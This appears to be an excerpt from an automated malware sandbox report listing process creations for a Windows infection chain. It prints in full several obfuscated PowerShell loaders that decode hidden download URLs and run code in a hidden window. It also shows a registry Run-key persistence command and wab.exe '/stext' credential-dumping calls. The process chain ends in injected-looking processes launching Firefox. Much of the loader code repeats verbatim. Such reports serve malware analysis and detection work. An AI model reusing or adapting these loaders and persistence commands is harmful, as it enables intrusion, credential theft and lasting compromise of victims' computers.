S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
